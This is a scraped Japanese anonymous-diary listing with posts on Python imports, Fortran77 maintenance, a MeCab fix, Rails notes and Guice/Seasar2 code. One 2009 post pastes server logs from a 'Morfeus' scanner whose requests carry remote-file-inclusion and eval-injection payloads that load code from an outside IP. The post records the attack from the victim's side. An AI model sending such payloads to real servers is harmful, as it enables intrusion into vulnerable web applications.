OBR.rd=OBR.rd||function(){function d(){var a=window;a.googletag=a.googletag||{};a.googletag.cmd=a.googletag.cmd||[]}function a(a,g,c,e){var d=window;d.$revee&amp;&amp;d.googletag.cmd.push(function(){d.$revee.track({obpid:a,obsid:g,obdid:c,obpu:e});b.d.log("revee fire:"+e);b.d.log("revee fire id:"+c)})}var c={},e=!0,b;c.h=function(a){b=a;c.cc={}};c.Yb=function(f){if(f&amp;&amp;!1!==f.g("activateRevee",!1)){d();var g=f.q("pid",0),h=f.q("sid",0),k=f.q("did",0),m=f.ka();e||c.cc[k]?e&amp;&amp;(e=!1,f=b.b.N(b.c.U+"rva.outbrain.com/analytics-v1.js",

!0,!0,function(){m=document.location.href;a(g,h,k,m)}),b.b.R(f)):a(g,h,k,m);c.cc[k]||(c.cc[k]=!0)}};c.B=function(){e=!0;c.cc={}};c.h(OBR);return c}();OBR.c=OBR.c||function(){var d={},a={},c=OBR,e;a.Cg="opera";a.Od="msie";a.zg="firefox";a.xg="chrome";a.Eg="safari";a.Bg="mozilla";a.Al="boolean";a.$k="string";a.Vl="object";a.gl="undefined";a.Ul="number";a.Pb="ob_iframe";a.$e=!0;a.Ff=0;a.ec="outbrain_widget_";a.wj="text/javascript";a.Eh="このエントリーをはてなブックマークに追加ツイートシェア

2016-01-10

違い

呼び出し方が変わってきます。詳細は、以下のコードをみてください。

 

使い方

import MODULE

import decimal
y = 0
for i in range(1,10):
  y = y + decimal.Decimal('0.1')

 

from MODULE import CLASS

from decimal import Decimal
y = 0
for i in range(1,10):
  y = y + Decimal('0.1')

 

ちなみに

from MODULE.CLASS import CLASS_METHOD とはできない。

http://stackoverflow.com/questions/21347346/python-importerror-no-module-named-datetime

2014-11-13

http://anond.hatelabo.jp/20141026015847

続き

xvideo_helper というgemをみつけたので、xvideoのスクレイピングは簡単に出来た。

ただ、一覧から取得しているのでdescriptionが途中で切れているものは、ページにアクセスしてnokogiriでパースしてtitleを取るようにした。

あと、microsoft_translator を使って翻訳かけたり、言語判定を入れてみたりした。

ベタッと一枚のファイルで書いてたものmoduleかしたりもして、ようやく形になって一段落

あとは、AWS cloudsearchで検索機能をつけたいな。

http://sp.eropop.net/

2014-10-11

http://anond.hatelabo.jp/20141011221350

Firefoxでも同様の表示を確認した。

で、開発者ツールちょっと追いかけてみたが、このイメージ自体はwidth:100%が設定されているものの、本来親になると想定しているclass:hatena-module-bodyのDIVではなく、BODYタグのものブロック親要素とされている模様、

2014-02-16

古いプログラムの書き直しをしたいけど

研究室で使っているFortran77のプログラム

配属されてからいろんな機能を追加してきた。中規模くらいのプログラムで、研究ではメインで使っている。

でもだんだんつらくなってきた。とにかく見づらい。

1980年代に作られたこのプログラムは今までの人たちのコメントの蓄積が半端ない

プログラム書き換えでとりあえずとっておいたコードコメント、書き換えた日時と人が書いてあるコメントプログラム中に混在している。

これらは実際に動く部分のコードよりも多く、可読性をかなり下げている。

前者については、ほとんどが不要だと思うのだがあまり考えずに消すと将来困るかもしれないのでちゃんと確認して消したい。

そして未だに残るGOTO文とFORMAT文と文番号。implicit noneではない暗黙の型宣言。

Fortran入門: 知識として必要な過去のFortran このページに書いてあるほぼすべてが詰まってる。

COMMON文もほぼすべてのサブルーチンにあったが、これはなんとかmoduleに書き換えた。

moduleに書き換えたとはいえ、本来は引数で渡したほうが適切なもの機械的にCOMMONからmodule文に書き換えたためその辺も見直したい。

一番面倒なのが一行の文字数制限。何段かのインデントを入れるとすぐにアウト。

エディタ使ってると自動でインデント入れてくれるのでいちいち直すのも面倒だし、インデント好きなのでできればインデント入れたい。

エディタといえばシンタックスハイライトfortran77モードだとうまく表示できないことが多い。

allocatableとかmodule文なんかは厳密に言えばfortran90以降の機能だけどコンパイラ対応してくれているおかげで使える。

でもエディタシンタックスハイライトにはそういうコンパイラが気を利かせたような実装は含めないのでうまく表示されない。

fortran90モードを使うと今度は行頭カラムの空白が守られなかったりしてコンパイルエラー

すっげー書き換えたい。全部きれいにしたい。他言語にするとあまりにも変わりすぎて教授が混乱するからせめてFortran90にしたい。

でもさ、よく考えるとこの書き換えって全く自分の実績にならないんだよね。

そもそも今までプログラム改良して出来る計算の幅をだいぶ広げたけど、それ自体は発表できないからほぼ表に出ない。

計算結果を出してそれを発表しないと表面的にはまったく意味が無い。

ましてやプログラム保守作業であるこの書き換えは計算結果に影響をおよぼすものでもないから研究成果にはまったく現れない。

しかプログラム書き換えた自分だけじゃなく、みんなも使うから書き換えた自分特別得するわけでもない。

プログラムすべてのコードを書き換えるのは単純に機械的にやっても結構時間がかかるし、書き換えても一発では絶対にうまく動かないから修正にも時間がかかる。

研究者の中にはそういうプログラム書いてばかりの人間馬鹿にする人もいる。プログラムを書いてる研究者自分の分野ではかなりヒエラルキーは低い。

情報系でもないんだし、それが研究の本筋じゃないからというのはわかる。自分たちのやるべきことじゃない。(でも専門性の高い道具を作り、整備する技術・人も必要なんじゃないかなと思ったりもする。)

やってもあまり得しないし他のことやったほうが絶対に自分の将来を助けるけど、ほっとくのもなんだかなあと悶々としている。

多分きれい好きの人が自分の部屋を見たら同じ苦悩を抱えると思う。

2012-11-13

Python3でMeCab

python3.2にpythonバインディングを入れようとしても途中でエラーが出る

AttributeError: 'module' object has no attribute 'split'

setup.pyの中で使われているstring.splitがpython3.2では使えなくなってるからなので以下のように変更すればおk

setup.py

def cmd2(str):
    return string.split (cmd1(str))

を以下に変更

def cmd2(str):
    return cmd1(str).split()

これでいけます。困ってる人がいたら参考にしてください。

2010-07-02

http://anond.hatelabo.jp/20100702003310

modrewryteなりなんなりして

moduleとかなんとかは、全部外からは見られないディレクトリにして

/view/account = index.php?view=account とかにmod_rewrite

index.phpは View=Accountを拾って View.phpApache外のディレクトリからrequire_onceしてパラメーターをaccountで起動

サイトファイル構成で死ぬほど悩む

■Aパターン

/admin

 /module

 └index.php

 └account.php

view.php

と言うパターンで、URLview.php?mode=accout

■Bパターン

/module

 index.php

 account.php

/admin

 view.php

として、モジュールはadmin外にして読み込ませる方法にするか

■Cパターン

/admin

index.php

account.php

と言うパターンで、ファイル個々に読み込む方法にするか

どれもそれぞれメリットあるし、どれでもよく使われてる。だから凄く悩む・・。

2010-01-14

はてなダイアリー最近の人気記事の表示方法

たとえば「Chikirinの日記」に「最近の話題エントリ」ペインってが右下にある。

http://d.hatena.ne.jp/Chikirin/20100113」

これと同じものを実装したいんだけど、自分ブログタイトルも一緒に表示されちゃう。

<hatena name="rss" url="http://b.hatena.ne.jp/entrylist?url=http://d.hatena.ne.jp/ブログ名/&amp;mode=rss" template="hatena-module" listlimit="10" moduletitle="最近人気のエントリ" showcategory="false" rel="nofollow"&gt;

ブログタイトルを消す方法って誰か知らない?

2009-12-07

株式会社プロアームからのスキャン活動(Morfeus Fucking Scanner)

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /?_SERVER[DOCUMENT_ROOT]=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 234 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /errors.php?error=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 223 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /?page=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 216 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /poll/png.php?include_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 231 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 272 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /admin/business_inc/saveserver.php?thisdir=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 242 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /webcalendar/tools/send_reminders.php?noSet=0&amp;includedir=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 256 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /cal/tools/send_reminders.php?noSet=0&amp;includedir=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 251 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /projects/includes/db_adodb.php?baseDir=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 241 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 242 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET /index2.php?_REQUEST[option]=com_content&amp;_REQUEST[Itemid]=1&GLOBALS=&amp;mosConfig_absolute_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 286 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:45 +0900] "GET //?mosConfig_absolute_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 231 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 237 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /project/includes/db_adodb.php?baseDir=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 240 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /board/include/bbs.lib.inc.php?site_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 240 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /dotproject/includes/db_adodb.php?baseDir=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 242 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 247 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /calendar/tools/send_reminders.php?noSet=0&amp;includedir=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 253 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /include/bbs.lib.inc.php?site_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 236 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /rgboard/include/bbs.lib.inc.php?site_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 242 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 259 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 255 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /index.php?option=com_content&amp;task=&amp;sectionid=&amp;id=&amp;mosConfig_absolute_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 269 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 260 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 259 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /?include_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 224 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /cacti/include/config_settings.php?config[include_path]=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 248 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /cms/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 245 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&amp;w=include($_GET[a]);&amp;a=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 307 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /index.php?DOCUMENT_ROOT=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 232 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:46 +0900] "GET /interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 259 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:47 +0900] "GET /plugins/safehtml/HTMLSax3.php?dir[plugins]=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 240 "-" "Morfeus Fucking Scanner"

202.143.75.76 - - [07/Dec/2009:09:43:47 +0900] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://202.143.75.76/1.gif?/ HTTP/1.1" 301 272 "-" "Morfeus Fucking Scanner"

2008-05-13

GuiceSeasar2 を連携させてみたよ

[参考文献]

    S2 は、.dicon ファイルで定義をだいぶ簡略化できる。パフォーマンスはどうなんだろう。誰かテストしてくれいw

    app.dicon

    <?xml version="1.0" encoding="UTF-8" ?>

    <!DOCTYPE components PUBLIC "-//SEASAR//DTD S2Container 2.4//EN" "http://www.seasar.org/dtd/components24.dtd">

    <components namespace="client">

    <include path="hello.dicon" />

    <component class="org.seasar.guice.Client" />

    </components>

    hello.dicon

    <?xml version="1.0" encoding="UTF-8" ?>

    <!DOCTYPE components PUBLIC "-//SEASAR//DTD S2Container 2.4//EN"

    "http://www.seasar.org/dtd/components24.dtd">

    <components initializeOnCreate="false">

    <component class="org.seasar.guice.HelloServiceImpl" />

    </components>

    HelloService.java、HelloServiceImpl.java は、上記 ITPro と内容が同じなので省略。

    Module.java

    package org.seasar.guice;

    import org.seasar.framework.container.S2Container;

    import org.seasar.framework.container.SingletonS2Container;

    import org.seasar.framework.container.factory.S2ContainerFactory;

    import com.google.inject.AbstractModule;

    import com.google.inject.name.Names;

    public class Module extends AbstractModule {

    S2Container container = null;

    public Module(S2Container container){

    this.container = container;

    }

    @Override

    protected void configure() {

    bind(S2ContainerFactory.class).annotatedWith(Names.named(container.getPath()));

    bind(Client.class).toInstance(SingletonS2Container.getComponent(Client.class));

    }

    }

    Client.java

    package org.seasar.guice;

    public class Client {

    private HelloService helloService = null;

    public void setHelloService(HelloService helloService) {

    this.helloService = helloService;

    }

    public void execute() {

    helloService.sayHello();

    }

    }

    Main.java

    package org.seasar.guice;

    import org.seasar.framework.container.S2Container;

    import org.seasar.framework.container.factory.SingletonS2ContainerFactory;

    import com.google.inject.Guice;

    import com.google.inject.Injector;

    public class Main {

    private static final String PATH = ".\\app.dicon";

    public static void main(String[] args) {

    SingletonS2ContainerFactory.setConfigPath(PATH);

    SingletonS2ContainerFactory.init();

    S2Container container = SingletonS2ContainerFactory.getContainer();

    Module module = new Module(container);

    Injector injector = Guice.createInjector(module);

    Client client = injector.getInstance(Client.class);

    client.execute();

    }

    }

    実行結果

    java -cp ?? org.seasar.guice.Main

    2008/05/13 21:19:22 org.seasar.framework.log.Logger info

    情報: Running on [ENV]product, [DEPLOY MODE]Normal Mode

    Hello, world!

    実行環境JDK 7 (build 1.7.0-ea-b24)

    2007-04-20

    []RubyRuby on Rails

    Ruby RDoc Documentation

    rubyとは - はてなダイアリー Rubyとは - はてなダイアリー

    はてなブックマーク - はてな - Rubyとは

    「ruby」を含む日記 - はてなダイアリー

    Ruby

    「Ruby」に関する画像、動画、ブログ記事のタグ検索結果

    Google ブログ検索

    買売システム開発記録とか何とか

    Rubyで投資システムを作る日記

    spacecadetの日記

    RubyForge: One-Click Ruby Installer: Project Info

    RDE(Ruby Development Environment) - Ruby??J??????????

    #!/usr/bin/ruby -Ks

    # print "Content-Type: text/html;charset=UTF-8\n\n"

    p "表示"


    Rails Rails Framework Documentation

    http://127.0.0.1/mysql/

    http://127.0.0.1:3000/ http://127.0.0.1:3000/recipe/list

    http://127.0.0.1:3001/ http://127.0.0.1:3001/recipe/list

    http://127.0.0.1:3001/account/signup http://127.0.0.1:3001/test

    http://127.0.0.1:3001/item

    Hot Chips (delete) Snacks 2004-11-11

    Ice Water (delete) Beverages 2004-11-11

    Killer Mushrooms (delete) Snacks 2005-09-13

    満足せる豚。眠たげなポチ。:Rolling with Ruby on Rails - Japanese Translation - p1

    満足せる豚。眠たげなポチ。:Rolling on Ruby on Rails - Japanese Translation - p5

    BookmarkOnInstantRails

    ITmedia エンタープライズ:第1回 Instant Railsで始めるWindows環境のRails (1/2)

    developerWorks Japan

    developerWorks Japan

    DROP TABLE IF EXISTS `items`;

    CREATE TABLE items (

    id int(11) NOT NULL auto_increment,

    login varchar(80) default NULL,

    password varchar(40) default NULL,

    PRIMARY KEY (id)

    );

    えぇてるのぉと:Railsでログイン認証 - livedoor Blog(ブログ)

    8 app/views/test/index.rhtmlの編集

    <h1>Test#index</h1>

    Welcom <%= @session['user'].login %>!

    Login Generator (1) - Nowhere Near

    config/environment.rb に以下の行を追加する。

    module LoginEngine

    config :salt, "your-salt-here"

    end

    Engines.start :login

    http://techno.hippy.jp/rorwiki/?Wiki%A4%F2%BA%EE%A4%C3%A4%C6%A4%DF%A4%EB%2F%A5%E6%A1%BC%A5%B6%A1%BC%A4%F2%C7%A7%BE%DA%A4%B9%A4%EB

    パパブログ: RoR : login_generator : login中のユーザ情報の取得

    @session['user'].id

    @session['user'].login

    @session['user'].password

    で、idやloginが取得できる。

    ちなみにidActiveRecordおなじみのidで、

    loginがログイン名、passwordパスワードになる。


    MySQL-Front download

    環境変数

    ;C:\nonidata\InstantRails\ruby\bin;

    cd C:\nonidata\InstantRails\ruby\bin

    C:\nonidata\InstantRails\ruby\bin>gem install login_generator

    Successfully installed login_generator-1.2.2

    C:\nonidata\InstantRails>cd C:\nonidata\InstantRails\rails_apps\cookbook

    C:\nonidata\InstantRails\rails_apps\cookbook>ruby script/generate login Account

    create lib/login_system.rb

    C:\nonidata\InstantRails\rails_apps>cd C:\nonidata\InstantRails\rails_apps\cookbook

    C:\nonidata\InstantRails\rails_apps\cookbook>ruby script/generate controller test

    exists app/controllers/

    [Ruby] Rails(ActiveRecord)の多対多関連 - yuum3のお仕事日記

    has_one

    has_many

    belongs_to

    has_and_belongs_to_many

    habtm と has_many :through (ActiveRecord)

    ヽ( ・∀・)ノくまくまー(2006-01-20)

    ActiveRecord の歩き方 - Association 編(1) - Rails で行こう! - Ruby on Rails を学ぶ has_many :comments

    developerWorks Japan  has_one :address

    Rubyist Magazine - RubyOnRails を使ってみる 【第 3 回】 ActiveRecord

    create メソッドを使うこともできます。create は new したあと save (DB に格納) します。


    Rubyist Magazine - RubyOnRails を使ってみる 【第 4 回】 ActionPack

    find(:all, :conditions => ["user_name = ?", user_name])

    find_all(["user_name = ?", user_name])

    find_all_by_user_name(user_name)


    Part2 Rubyに学ぶ「Ruby on Railsの正体」:ITpro

    book = Product.find_or_create_by_name_and_price('book', 2079)

    リスト7●productsテーブルからnameが'book',priceが2079であるようなProductオブジェクトを読み取り,存在しなかった場合はデータベースレコードを新規作成する処理


    RoR Wiki 翻訳 Wiki - HowToUseLegacySchemas

    恣意的で複雑なクエリや、主キーを持たないテーブルにはfind_by_sqlを使う

    テーブルが論理的な主キーを持たないなら、

    find_by_sqlを使えば主キーを全く指定しない曖昧で複雑なクエリを実行も実行できる。

    Post.find_by_sql ["SELECT * FROM posts WHERE author = ? AND created > ?", author_id, start_date]


    エディタ utf8

    文字化け

    ヽ( ・∀・)ノくまくまー(2006-10-11)

    チュートリアルを動かしてみる - 肩書「シニアコンサルタント」のつぶやき

    Railsでソーシャルブックマークを作ってみようか(第1回) - 坊やがゆく

    ようこそ<%= @session['user'].login %>さん

    @session['user'].id


    Railsでソーシャルブックマークを作ってみようか(第2回) - 坊やがゆく

    Railsでお馴染み37signalsのURLが凄い件について:TKMR.blog.show

    URLにキーワードを含めことでSEO対策になるかも、でもそれだけ:TKMR.blog.show

    http://127.0.0.1:3001

    http://127.0.0.1:3001/recipe/list

    tetraの外部記憶箱 - Instant Railsのインストール , 追記:phpMyAdminの日本語環境設定 , 未踏ソフト記事

    [Ruby]PHP VS Rails (Ruby on Rails)

    2007-01-09

    http://anond.hatelabo.jp/20070108162953

    こうですか?わかりません><

      - module: CustomFeed::Debug
        config:
          title: Aice5 in Wonder Radio
          entry:
            - title: Aice5 in Wonder Radio
              link: http://www.starchild.co.jp/artist/aice5/radio/aice5.asx
      - module: Filter::EntryFullText
        config:
          store_html_on_failure: 1
      - module: Filter::FindEnclosures
      - module: Filter::FetchEnclosure::Mplayer
    
     
    アーカイブ ヘルプ
    ログイン ユーザー登録
    ようこそ ゲスト さん